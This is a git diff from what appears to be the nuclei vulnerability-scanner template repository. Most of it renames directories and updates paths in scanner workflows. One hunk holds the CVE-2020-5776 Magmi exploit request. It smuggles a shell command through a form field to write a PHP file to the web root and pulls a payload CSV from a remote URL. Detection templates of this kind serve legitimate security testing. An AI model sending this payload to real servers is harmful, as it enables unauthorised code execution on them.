diff --git a/.nuclei-ignore b/.nuclei-ignore index f565648fa6..2de13a9905 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml fuzzing/ # Wordlist directory contains payload to be used with templates. -wordlists/ -misc/ +helpers/ +miscellaneous/ # Workflows are excluded from default run to avoid duplicate scans. workflows/ \ No newline at end of file diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 5a04ba81be..0c7e24a866 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -20,7 +20,7 @@ requests: Content-type: application/x-www-form-urlencoded Connection: close - profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= + profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= - | POST /magmi/web/magmi_run.php HTTP/1.1 Host: {{Hostname}} diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index f99943bae8..b0d8716cb7 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -17,7 +17,7 @@ info: requests: - payloads: - data: "payloads/CVE-2020-6287.xml" + data: helpers/payloads/CVE-2020-6287.xml raw: - | POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 diff --git a/technologies/jira-detect.yaml b/exposed-panels/jira-detect.yaml similarity index 100% rename from technologies/jira-detect.yaml rename to exposed-panels/jira-detect.yaml diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml index bd812df538..3ec202210b 100644 --- a/fuzzing/basic-auth-bruteforce.yaml +++ b/fuzzing/basic-auth-bruteforce.yaml @@ -2,7 +2,7 @@ id: basic-auth-bruteforce info: name: Basic Auth Bruteforce - author: "@w4cky_" + author: w4cky_ severity: high # Impotent Notes:- diff --git a/fuzzing/wp-plugin-scan.yaml b/fuzzing/wp-plugin-scan.yaml index 68e783a268..26e06c7894 100644 --- a/fuzzing/wp-plugin-scan.yaml +++ b/fuzzing/wp-plugin-scan.yaml @@ -8,7 +8,7 @@ info: requests: - payloads: - plugin_wordlist: wordlists/wp-plugins.txt + plugin_wordlist: helpers/wordlists/wp-plugins.txt # Thanks to RandomRobbieBF for the wordlist # https://github.com/RandomRobbieBF/wordpress-plugin-list diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index f7b4996622..00c8369277 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: panels/cisco-asa-panel.yaml + - template: exposed-panels/cisco-asa-panel.yaml subtemplates: - template: cves/2020/CVE-2020-3187.yaml diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index cc1c9b28f2..92d69b997f 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: panels/grafana-detect.yaml + - template: exposed-panels/grafana-detect.yaml subtemplates: - - template: default-credentials/grafana-default-credential.yaml \ No newline at end of file + - template: default-logins/grafana-default-credential.yaml \ No newline at end of file diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 00fc16e057..f2e06b990f 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: technologies/jira-detect.yaml + - template: exposed-panels/jira-detect.yaml subtemplates: - template: cves/2017/CVE-2017-9506.yaml @@ -23,8 +23,4 @@ workflows: - template: cves/2019/CVE-2019-11581.yaml - template: cves/2020/CVE-2020-14179.yaml - template: cves/2020/CVE-2020-14181.yaml - - template: security-misconfiguration/jira-service-desk-signup.yaml - - template: security-misconfiguration/jira-unauthenticated-dashboards.yaml - - template: security-misconfiguration/jira-unauthenticated-popular-filters.yaml - - template: security-misconfiguration/jira-unauthenticated-projects.yaml - - template: security-misconfiguration/jira-unauthenticated-user-picker.yaml + - template: vulnerabilities/jira/ diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index 3202ca6986..f3b7a93901 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -14,4 +14,4 @@ workflows: matchers: - name: mida-eframework subtemplates: - - template: vulnerabilities/mida-eframework-xss.yaml + - template: vulnerabilities/other/mida-eframework-xss.yaml diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index 0a35bee6ab..349ce0f23b 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -10,7 +10,7 @@ info: workflows: - - template: panels/rabbitmq-dashboard.yaml + - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: - - template: default-credentials/rabbitmq-default-admin.yaml \ No newline at end of file + - template: default-logins/rabbitmq-default-admin.yaml \ No newline at end of file diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index e574b531cf..654c9f341e 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -9,8 +9,8 @@ info: # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: panels/solarwinds-orion.yaml + - template: exposed-panels/solarwinds-orion.yaml subtemplates: - template: cves/2018/CVE-2018-19386.yaml - template: cves/2020/CVE-2020-10148.yaml - - template: default-credentials/solarwinds-default-admin.yaml \ No newline at end of file + - template: default-logins/solarwinds-default-admin.yaml \ No newline at end of file diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index a4c9033dfd..996a91be43 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -15,5 +15,4 @@ workflows: - template: cves/2018/CVE-2018-1271.yaml - template: cves/2018/CVE-2018-1271.yaml - template: cves/2020/CVE-2020-5410.yaml - - template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml - - template: vulnerabilities/springboot-h2-db-rce.yaml + - template: vulnerabilities/springboot/ \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 8b08889fc4..5c9a2d1181 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -16,17 +16,4 @@ workflows: - template: cves/2019/CVE-2019-15858.yaml - template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-9978.yaml - - template: files/wordpress-db-backup.yaml - - template: files/wordpress-debug-log.yaml - - template: files/wordpress-directory-listing.yaml - - template: files/wordpress-emergency-script.yaml - - template: files/wordpress-installer-log.yaml - - template: files/wordpress-tmm-db-migrate.yaml - - template: files/wordpress-user-enumeration.yaml - - template: security-misconfiguration/wordpress-accessible-wpconfig.yaml - - template: vulnerabilities/sassy-social-share.yaml - - template: vulnerabilities/w3c-total-cache-ssrf.yaml - - template: vulnerabilities/wordpress-social-metrics-tracker.yaml - - template: vulnerabilities/wordpress-wordfence-xss.yaml - - template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml - - template: vulnerabilities/easy-wp-smtp-listing.yaml \ No newline at end of file + - template: vulnerabilities/wordpress/